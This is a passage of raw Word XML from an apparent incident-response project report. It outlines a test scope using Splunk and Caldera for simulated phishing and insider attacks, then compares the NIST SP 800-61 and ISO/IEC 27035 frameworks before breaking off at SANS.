        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="2DAC5D1D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="2DAC5D1D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Splunk</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for threat detection, event correlation, and log management.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="7D0B2EAC" w14:textId="3DD75C5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Deployment of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Caldera</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as the attacker machine and C2 server to simulate adversarial behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="7FCC0C97" w14:textId="0A769F1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Execution of two primary incident types:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="62A77B18" w14:textId="5EDA4179">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>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Phishing Attack</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 targeting user credentials and initial access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="425765A8" w14:textId="44A2003B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>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Insider Attack</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 simulating malicious activity from within the organization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="418AF594" w14:textId="0FBE33B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Documentation of findings, response efficiency, and improvement areas following each test scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="66A404DD" w14:textId="66748380">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This scope ensures that both detection and response capabilities are examined from a technical and procedural perspective, aligning with real-world operational challenges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="6627E753" w14:textId="7C2312BF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Incident Response Frameworks Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="5C5C0205" w14:textId="7DD7BEE3">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This section provides a comparative overview of three leading incident response frameworks —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NIST SP 800-61</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ISO/IEC 27035</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and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SANS</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 to </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identify</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best practices and </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>determine</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which approach best supports the creation of a comprehensive and effective Incident Response Plan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="59508C41" w14:textId="470BBFC7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="2DF734B4" w14:textId="6B00742C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NIST SP 800-61 (National Institute of Standards and Technology)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="464B17E9" w14:textId="799A6367">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The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NIST SP 800-61 Revision 2</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titled </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“Computer Security Incident Handling Guide,”</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is one of the most widely adopted frameworks for managing cybersecurity incidents. It was developed to help organizations </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>establish</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 structured and repeatable process for incident detection, containment, eradication, and recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="07FB039A" w14:textId="7178DD89">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NIST divides the incident response lifecycle into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four main phases</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="2F25E0B4" w14:textId="662599F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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Preparation:</w:t>
      </w:r>
      <w:r>
        <w:br/>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This phase focuses on building the foundation for effective incident response. It includes </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>establishing</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an incident response team, defining communication plans, deploying necessary tools (such as SIEM systems), and conducting regular training and awareness programs to ensure readiness.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="1FB0F0DF" w14:textId="18911195">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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Detection and Analysis:</w:t>
      </w:r>
      <w:r>
        <w:br/>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In this stage, organizations focus on </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identifying</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suspicious activities through monitoring tools, logs, and alerts. Analysts </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>validate</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whether a detected event qualifies as an incident, classify it by type and severity, and begin initial documentation and escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="4667E7DC" w14:textId="0D9B021B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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Containment, Eradication, and Recovery:</w:t>
      </w:r>
      <w:r>
        <w:br/>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Once an incident is confirmed, containment strategies are applied to prevent further damage (e.g., isolating affected systems). Eradication involves removing malicious artifacts such as malware or unauthorized accounts, while recovery focuses on restoring normal operations safely and verifying that systems are secure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="5BACF1AA" w14:textId="2C84CCED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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Post-Incident Activity:</w:t>
      </w:r>
      <w:r>
        <w:br/>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After recovery, teams conduct a detailed review to document lessons learned, improve detection and response capabilities, and update security controls and policies to prevent recurrence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="26D83653" w14:textId="6CAC4F46">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166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST’s </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is valued for its </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clarity, structure, and emphasis on documentation and continuous improvement</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It provides an excellent foundation for organizations </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seeking</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to build or mature their incident response capabilities, especially when using tools such as </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="715D2CED">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Splunk</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SIEM</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="23446381">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for monitoring and analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="0258120C" w14:textId="3D62554E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="54303668" w14:textId="10E92CCF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ISO/IEC 27035</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="571DF71A" w14:textId="4E400172">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The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ISO/IEC 27035</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standard defines a global, structured approach to information security incident management that aligns closely with broader governance and risk management systems. It emphasizes the full incident management lifecycle, including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preparation, detection, assessment, response, and post-incident review</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="43D630AA" w14:textId="2F504251">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Unlike NIST, which focuses </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mainly on</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operational processes, ISO/IEC 27035 integrates incident response with the organization’s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Information Security Management System (ISMS)</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and overall business continuity strategy. It encourages proactive readiness, clear communication channels, and continuous learning, making it ideal for organizations aiming for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international certification and compliance</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under ISO standards such as ISO/IEC 27001.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="75AE6215" w14:textId="0139F8C1">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The key strength of ISO/IEC 27035 lies in its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governance and scalability</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 it provides a framework that ensures incident response is not an isolated technical function but a strategic </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component</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of risk and security management across the enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="79ED4AAB" w14:textId="0F2AC9F0">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0386688B" w:rsidP="732EE1AE" w:rsidRDefault="0386688B" w14:paraId="6992C00E" w14:textId="331C20B7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SANS (</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="0386688B">
        <w:rPr>
